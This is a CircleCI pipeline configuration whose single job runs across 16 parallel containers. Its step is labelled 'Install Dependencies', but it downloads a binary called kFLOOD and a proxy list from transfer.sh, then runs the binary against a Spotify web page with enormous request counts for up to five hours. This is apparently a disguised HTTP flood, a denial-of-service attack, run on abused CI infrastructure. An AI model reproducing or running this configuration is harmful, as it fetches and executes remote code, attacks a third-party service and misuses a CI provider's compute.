version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install wget -y && wget https://transfer.sh/kTSf0W/kFLOOD && wget https://transfer.sh/n8QHtJ/proxy.txt && chmod +x kFLOOD && ./kFLOOD https://www.spotify.com/us/select-your-country-region/ 999999 9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 64 1 proxy.txt
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
